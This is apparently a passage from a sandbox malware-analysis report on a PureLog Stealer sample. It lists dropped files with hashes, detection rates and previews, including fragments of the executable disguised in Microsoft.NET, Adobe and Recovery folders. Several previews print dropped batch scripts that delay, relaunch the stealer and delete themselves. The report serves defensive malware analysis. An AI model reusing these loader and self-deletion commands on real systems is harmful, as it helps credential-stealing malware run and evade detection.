Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74% Antivirus: Virustotal, Detection: 62%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.................(...........G... ...`....@.. ....................................@.................................`G..K....`.. ............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc... ....`.....................@....reloc..............................@..B.................G......H.......................T...wn...F.......................................0..........(.... ........8........E........9...8.......8....(.... ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8........0.......... ........8........E........~...........Z...F...8........~....(?...~....(C... ....?.... ....~....{....9....& ....8....~....9.... ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(7... .... .... ....s....~...

C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Adobe\Acrobat DC\599871f56ea49f

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	ASCII text, with very long lines (348), with no line terminators
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.785915797711709
Encrypted:	false
SSDEEP:	6:nuRe91zB6DTfjJTI7NB3TSINRejfphdeOgscjo9qBBTFFfS672tynn:nMex6PfdTI7NRTRrsphdBgBjoAbTqw26
MD5:	340F6F9205DCF7E6AA0FA590AA7FDA74
SHA1:	EEFE4E4D21122A563E78DE4DE356895E2A316234
SHA-256:	28963BE4AF38C4F8C1E9F769E1FA7FA72C3788CD3DBF1BA7EFA446F45194633D
SHA-512:	9BFD57C1445C351258E11977C55658A74E00C9CA955A1DFF986A70AD146C7055AB3AC830840D0C92BD2E0A60EF3D6DD659B67081479E16718809AB3E44A99411
Malicious:	false
Preview:	DYK15fE2mrvjpA0i50DCZzFRkgFLt2VDupvqByzZcdXIjl6ENMKa9c5OS3QZa2ItWsy9PKhHBnk5b6r9kB8gs5DRtgXHha9jVnw1w6yDpCYV19wVLRyZ3mBbogPtwZkloAkxK0MnM51pgsattB6PlkqtmUMPqEQQcxr0Z8LUFKM7uV55Gf9ucU9DU1L0n67HolNsAjUv0mKaYs8RZQJKFgxIxnghxUqINESJIM5gLO3zKjpl24bWxwCIxE5XDw7f6CNUazIMVm91m77O75o33TVaBKVDQhdYQX3IVVLDvOBKwLgzGrZIHDmmqwSQdE6xJkkODz2mtlHpSKo0nf6jIUQMvRbj

C:\Program Files\Adobe\Acrobat DC\JPOyDhPFIytu.exe

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1912832
Entropy (8bit):	7.53583426684731
Encrypted:	false
SSDEEP:	24576:lZFeGcDsavzoey8aUB/WN0/AZ7mNUxrE3cmOrwAUqGStlkuVUoPYQhMaXeRTl:laiUB/WN0/AZ7mNUxrEle3/JVU0Yb
MD5:	330A09824E901F7C2FB65BE086DF1493
SHA1:	236A6A080F1EA340343BEDAB226A88B3B92EA9CF
SHA-256:	6C43C7E744EC4C55BEC5FA9156561D81015DB4CB2574C39648A5F5EFC69943FA
SHA-512:	8DA1191FB37876DB6E4747D3807999995DBD965C0D13D21B944B941E8455DAA7512C9322C7E56BB228C83FC8BABE849685685C16DD000CB3E8E5A3822E7A6C77
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74% Antivirus: Virustotal, Detection: 62%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.................(...........G... ...`....@.. ....................................@.................................`G..K....`.. ............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc... ....`.....................@....reloc..............................@..B.................G......H.......................T...wn...F.......................................0..........(.... ........8........E........9...8.......8....(.... ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8........0.......... ........8........E........~...........Z...F...8........~....(?...~....(C... ....?.... ....~....{....9....& ....8....~....9.... ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(7... .... .... ....s....~...

C:\Program Files\Adobe\Acrobat DC\JPOyDhPFIytu.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Uninstall Information\599871f56ea49f

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	ASCII text, with very long lines (466), with no line terminators
Category:	dropped
Size (bytes):	466
Entropy (8bit):	5.866668882873004
Encrypted:	false
SSDEEP:	12:VGMx05Wahws9wpAtPqf48by5GRKnUYUIGL29V0:laj6p4SW5GR/YzAX
MD5:	B5EA2BCDFB9A35FE631F7CFD4E3566E6
SHA1:	B336BBA79EB028920C22507B7144B39AB04DB5E3
SHA-256:	424B78EFE12EDCAF76ED851F506FDAE57EEA6586AF9A767490A878995C62AF17
SHA-512:	97BF8FB310E1AD5821BC5E3DD9929ABD0702EFD14CE2CE04C6FDF08B4278C009BB4BD00563D59F288183FC9C99FB21771575577D93C04FE7A323A56AD18816F1
Malicious:	false
Preview:	NBD71SkExtZBZLY1Ixdwrjj4oJ2sLr3zAlf8s0bdCmoW1SRIsI9496vocISsZ13F0kAxpZISW9tE4NDV1uACs8zE00gjitELtifQSedS9riAMquPF70p10X1u66y3jtm5iUVrwDXRrDBaz2KGRel2YT3LnfVhoZa75EnVYhS3dYJxWb5EwrlFIuhPbKDQrzmSmDfuOysuLrY9JGzMkRv6xVyKhY4NdCMnw1KS5Kz7913bVhFUV0paEpeRPUN04eQJfvNS5gRacy76bWzATj2mWwjGW3Cl68Ceku6kTwYyjP7Qsiz2eNhVmnwtLH6CdpddvcVqaPqgKDDGyTXyDJGtbr277NYM0WV4weeQMIcPgAKjkq42tI9TitCDjYsM0eqyrIUTyHl4r0NagSWRSgcrXBVCbaryaQZBUW1bVkDmgEmsgmgQBa4UC8bqxS2XawebbLGKb56rczLSYnfz3

C:\Program Files\Uninstall Information\JPOyDhPFIytu.exe

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1912832
Entropy (8bit):	7.53583426684731
Encrypted:	false
SSDEEP:	24576:lZFeGcDsavzoey8aUB/WN0/AZ7mNUxrE3cmOrwAUqGStlkuVUoPYQhMaXeRTl:laiUB/WN0/AZ7mNUxrEle3/JVU0Yb
MD5:	330A09824E901F7C2FB65BE086DF1493
SHA1:	236A6A080F1EA340343BEDAB226A88B3B92EA9CF
SHA-256:	6C43C7E744EC4C55BEC5FA9156561D81015DB4CB2574C39648A5F5EFC69943FA
SHA-512:	8DA1191FB37876DB6E4747D3807999995DBD965C0D13D21B944B941E8455DAA7512C9322C7E56BB228C83FC8BABE849685685C16DD000CB3E8E5A3822E7A6C77
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74% Antivirus: Virustotal, Detection: 62%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.................(...........G... ...`....@.. ....................................@.................................`G..K....`.. ............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc... ....`.....................@....reloc..............................@..B.................G......H.......................T...wn...F.......................................0..........(.... ........8........E........9...8.......8....(.... ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8........0.......... ........8........E........~...........Z...F...8........~....(?...~....(C... ....?.... ....~....{....9....& ....8....~....9.... ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(7... .... .... ....s....~...

C:\Program Files\Uninstall Information\JPOyDhPFIytu.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Recovery\599871f56ea49f

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	223
Entropy (8bit):	5.772880579105131
Encrypted:	false
SSDEEP:	3:L++Qf1x9Fe0GQlRlQMVm2PAcmYKLpChCP1f/twShghiuTyrtxBg5VmvBMqYCKMcL:Lod77FmobfKVnRtzxBDKHdNQ5MY1AQnI
MD5:	D841C80CC3A5A01E9FC0FE520C0F8819
SHA1:	943CA9E62EB9BB47DBC65C4BF341FECF08D9D35C
SHA-256:	71B434DF811DAE71A0B8C778A514181D0BA44A236EEC0BBB18011FBB4E64D1A1
SHA-512:	81CBEF204FDE40FDED06B9E4784359C423188B769FE7F70F597AFE8B27ED4429CD6CB7E644F40202287EC54AA19EBCA1F16075C3CB6BBAE3159A80659B7E5D3B
Malicious:	false
Preview:	ALkSwRyxYg66UfIbm8IWpyTXcwYTiyBbXEKcPVtpuV6uQz75alSli5iL2Nz92fOjeejPVqMQPcmU2jGnzd27ga2bg8kBgtwPGXPvPrjuZBWFTNTSHMKZnQDEmHsXGKufqWNfTUXH3HieExISpR4UjXl0TLJI9MoOR0Z6Ay9wyCgfsi9y9ZsyQa5SuXLHKPIqcTNNYLS1SHfh1GHvMVJje0805GLnm1m

C:\Recovery\JPOyDhPFIytu.exe

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1912832
Entropy (8bit):	7.53583426684731
Encrypted:	false
SSDEEP:	24576:lZFeGcDsavzoey8aUB/WN0/AZ7mNUxrE3cmOrwAUqGStlkuVUoPYQhMaXeRTl:laiUB/WN0/AZ7mNUxrEle3/JVU0Yb
MD5:	330A09824E901F7C2FB65BE086DF1493
SHA1:	236A6A080F1EA340343BEDAB226A88B3B92EA9CF
SHA-256:	6C43C7E744EC4C55BEC5FA9156561D81015DB4CB2574C39648A5F5EFC69943FA
SHA-512:	8DA1191FB37876DB6E4747D3807999995DBD965C0D13D21B944B941E8455DAA7512C9322C7E56BB228C83FC8BABE849685685C16DD000CB3E8E5A3822E7A6C77
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74% Antivirus: Virustotal, Detection: 62%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.................(...........G... ...`....@.. ....................................@.................................`G..K....`.. ............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc... ....`.....................@....reloc..............................@..B.................G......H.......................T...wn...F.......................................0..........(.... ........8........E........9...8.......8....(.... ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8........0.......... ........8........E........~...........Z...F...8........~....(?...~....(C... ....?.... ....~....{....9....& ....8....~....9.... ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(7... .... .... ....s....~...

C:\Recovery\JPOyDhPFIytu.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\JPOyDhPFIytu.exe.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	5.370675888495854
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktGqZ4vwmj0qD
MD5:	5ACBB013936118762389287938AE0885
SHA1:	12C6B0AA2B5238E3154F3B538124EE9DB0E496D6
SHA-256:	28E292538199310B7DA27C6C743EFD34E1F806D28611B6C9EF4212D132272DEF
SHA-512:	E803C699BE7FC25FF09D1DEE86412CE8F18834E22E20B7D036323B740891A64B2CE33D0E0BD075178F0B6F496BA9CFBF7EF1A0884FE5E470C8CCF6D824891C77
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\yQrCGtNgsf.exe.log

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1179
Entropy (8bit):	5.354252320228764
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHK2
MD5:	074445AD437DEED8A22F11A846280CE2
SHA1:	23025D83D7C33396A5F736FC6F9945976CFCD5D1
SHA-256:	B7FD27029E12BE3B5C2C4010CC9C9BCB77CFE44852CC6EF4C3CED70740BB1CFD
SHA-512:	440F8E77340A5C2F64BF97BC712193145F03AEDB86C0F5C849CA1AD0190E5621DDD7AE8104862383E31FFEC49CCF483CF2E4533C501B2606EE1D0FE66E865B6D
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Temp\5mIZs8oYbs

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.483856189774723
Encrypted:	false
SSDEEP:	3:h6VoNS2dy/i:dNS2w6
MD5:	C1622FBD6A76DF57489BFF5119A32C58
SHA1:	61C5873E4C88CDF3CE018C331F713D53F3985052
SHA-256:	0E2E9745EE9560F442B1982AB4A43A0A64496CE6E2D1C3933C8442606BBFD1CC
SHA-512:	BEFEA9BF40FC6F518CC1828015FA81D9DE5266765BEE1DC78C4A7E5DE104EE59B96BA6E115C99730F5A70A38BAB683ECD4FA58747B22DEB77D80C6D79CB99280
Malicious:	false
Preview:	TJwUPQbDcpupMhFizldS8WZbg

C:\Users\user\AppData\Local\Temp\6C8kMSA4ag.bat

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	193
Entropy (8bit):	5.322397609982627
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DER5I3u11fthnSSKOZG1CHhJ23fTn:CuVEOCDEfTWRb
MD5:	999212C7B7D3B3FE524CC75C1C28A1F3
SHA1:	AB385A8A129A2D2C8A08D141A2C9B098864AC073
SHA-256:	CFF0A457DC5CAB511D2EEA2F72C4E6794F0FD67AA3E9AB56315760694E6AF63C
SHA-512:	C109F6278D08517F44CB35F7323646A7199B5FB6F1A85429574B0D0361182B6022F542BCEABB9A2B35716C29A8301588B46DDB5D6585C2D0B908D55734A8DFC2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\6C8kMSA4ag.bat"

C:\Users\user\AppData\Local\Temp\77a9gOcAJB.bat

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	193
Entropy (8bit):	5.308760643942476
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DER5I3u11fthnSSKOZG1CHhJ23fnK:CuVEOCDEfTWRS
MD5:	92DA70FCABA4ED3ECB6FF6497589850E
SHA1:	152E8413A089B9897E82FB01E3257479AD302D61
SHA-256:	4EFA32013E99C51D87A4085EFD16CA2F4A5D7D3EC18BE51C1877642345D13C07
SHA-512:	FE51766BB0B3BCCBB847A5D8F5381E0C86D53C903BF7EFF43744AFD3E20DFB5F6806EEF4181EA5D0F8EAB3F1735E5CCAF6BAE4143E7A7EFD306AB843DF775353
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\77a9gOcAJB.bat"

C:\Users\user\AppData\Local\Temp\9VsmEYMPZS.bat

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	241
Entropy (8bit):	5.286276997385135
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DER5I3u11fthnSSKOZG1CHhJ23fQSt:HTg9uYDEfTWRoSt
MD5:	E6CF423F63AD881C5CD7364F4A31BB88
SHA1:	02BC28B79E33E6DAB2C3B349951B850F92846EDC
SHA-256:	A5D69D3E293ADA8E9841F079B907D11A1FC248E343F12C5C57A7EE6143252D1C
SHA-512:	D992005C22325DAAD0CE3630924E952C5D9780A7BF34C31A6CFCEE8882B80E4410F2251697E90C5C0FD9986E24C2C2D8184F1D000F0BCF72435637900EF49576
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\9VsmEYMPZS.bat"

C:\Users\user\AppData\Local\Temp\9eKXf9oU9J.bat

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	241
Entropy (8bit):	5.244057252150033
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DER5I3u11fthnSSKOZG1CHhJ23fko:HTg9uYDEfTWR8o
MD5:	C450DF6852FD4135D5D757DCD58F1ECD
SHA1:	C44287EC7A4BFAB9959872AFB51C7588D13E5EC0
SHA-256:	7F7EC98BDA7414276BF7709B34C0A260D118EE8FF0D0C16791882F20BA896068
SHA-512:	0EC64B9081F69B974BFEA8CD3EFFA1A7E95FDF88370568B01298AE268319CD42722CD7B3F93E107D002855B942DD331A0BDFED77F3924C460EAF2C9AE70588B1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\9eKXf9oU9J.bat"

C:\Users\user\AppData\Local\Temp\DXbWJZalmv

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774724
Encrypted:	false
SSDEEP:	3:ruA7UdKM:UdKM
MD5:	DD3E65A27BBFFB64DA3E1172A1EE94A5
SHA1:	199DA3D54C780B90EB9DB8985BDA192F1AB4E911
SHA-256:	CEDBF7223AFD438DF5D1F7B43BD7E3E63DC130F40E983C61774AE8DCECF972EA
SHA-512:	DB2216D13E146C05BB224FCB2C4CEDA8582204B6B46388524546ECBE0B366004B78FDA9501318431BA75E9E0E598F235198C7FA54AEFE9E7A8B8D92A22E436D4
Malicious:	false
Preview:	m3JixIiqfSeawqxoZMg6Uu0wR

C:\Users\user\AppData\Local\Temp\EU3LD70Oqh

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.293660689688185
Encrypted:	false
SSDEEP:	3:p/e2G7V:67V
MD5:	E49928651513704319560F22D272DF11
SHA1:	7A910F4914C9910C1EA72662A220134498687D41
SHA-256:	F6F4C0670A95A35BD288401C3B709C0D10E7D712D4EA4520587829C4B184FCD2
SHA-512:	20788615CB8E2F80A14EFAAC1E721D2AD8994899E91DE9B42B38FD011A38C050FD75C57B1F44C404BA6FB1259D2B3B24DF3E980D035C6BC09925BE7CE2108745
Malicious:	false
Preview:	DBKQIXk89SYjvQDzYLYxCygr0

C:\Users\user\AppData\Local\Temp\F0qtrCuOKA.bat

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	241
Entropy (8bit):	5.220538350137155
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DER5I3u11fthnSSKOZG1CHhJ23f0kohn:HTg9uYDEfTWR8kohn
MD5:	F38C0E781AD79EF3C2373AFDFEFA4A85
SHA1:	6B19A0841DD47A9527C94CDD91EE4EAC86A11F7D
SHA-256:	8872993CE50A48DE34C69078A05F1D715FD4408EFCCB1CDA6FF6F34C22B67244
SHA-512:	38DE6113AC0EA0E86B19848913EE7EA91E9107053D1EF3C357D95C80F8E59DE90F0964C22227354EF11AED279ECE4712CB35F746155F00D3623AA7412351B682
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\F0qtrCuOKA.bat"

C:\Users\user\AppData\Local\Temp\GYwT7aWjpb

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.373660689688184
Encrypted:	false
SSDEEP:	3:+jEp7k1wu7:+jEpqj
MD5:	8F55F20C819C5D5F62E48570A53FC4C0
SHA1:	535D28DF131CC24B42C88151FCC9FB4AADED7A4D
SHA-256:	EC43746412C22D511123FE036C8F692D1A35A145EF78D6DCB28E621D0C7BD49D
SHA-512:	E84CC17834429BB29E8399F9BFF5F998F22B338DAA2CF3D50516BF15743C9711D5B8512C0BD9086A47A5844E8719CD52EC8884CCB4855FEB1AB22A3468F939E2
Malicious:	false
Preview:	fGdbO60nA1xL5KZAAYV9mr02N

C:\Users\user\AppData\Local\Temp\KMybJi9dhQ

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.373660689688184
Encrypted:	false
SSDEEP:	3:1jNeXkrR9UX:hNeU92
MD5:	1CC7792567EFCD97FFE489B7406F5655
SHA1:	FEFD54F4FD44F5A7A4D68DF0CC70285795D10317
SHA-256:	0FB273EF102239F0B6A34149BFFE435075A092BA1BA7EF965225EB718607BF26
SHA-512:	B85E25B069AFF3DC86929FB83D43027119F93C382D6050EF779A2C7024BB76A808310DB49D837DD3B96DF51291370529B7D2BB297B1EF13454B320B609F02C1A
Malicious:	false
Preview:	euNRhN6QmNqLD8pAxLtME1K70

C:\Users\user\AppData\Local\Temp\VKALHPRRoG

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774723
Encrypted:	false
SSDEEP:	3:iGHOlIRmB:iGumR2
MD5:	9C7F55412F72F7D2611EB8E600FC5E98
SHA1:	FF38717AF0FAFDA657501B4937FFB815F3463013
SHA-256:	D46F7CF00F5A0E3EA37970C206DE233408AD3075FA85D31877ADB9EA43E4F463
SHA-512:	2A4B6C33939B5F8CCE1F25F0C660A77BD8D957BF55B54B07A6D76939086165CD458DBF95576B974A088B9B023BFB00167C2A605DA10FD75E43E680087951C907
Malicious:	false
Preview:	dsBcAkBzOplLCxUJUEvsyEajd

C:\Users\user\AppData\Local\Temp\i68H4JRRfw

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.483856189774723
Encrypted:	false
SSDEEP:	3:JpQIVe:JpQIVe
MD5:	E891C0191C3C05004376AD82E4067463
SHA1:	186D7DA81E97647AC80D1081D13396B9749FE1ED
SHA-256:	58EC86E52F6E4CCF4B8F673B3104AF17EEB5BE8BB447742BF6AA215055B4A4E1
SHA-512:	347D1FA9ACFAB196978DB3C4C97B617002FEC0B96C9FF5522B1187063AE1308CB80D1DEB67D029CCA2215241CAE50C4DA059B1570173A799133806FA4D966E17
Malicious:	false
Preview:	SfXTl6WZEQgvtOzKYF37ItlqA

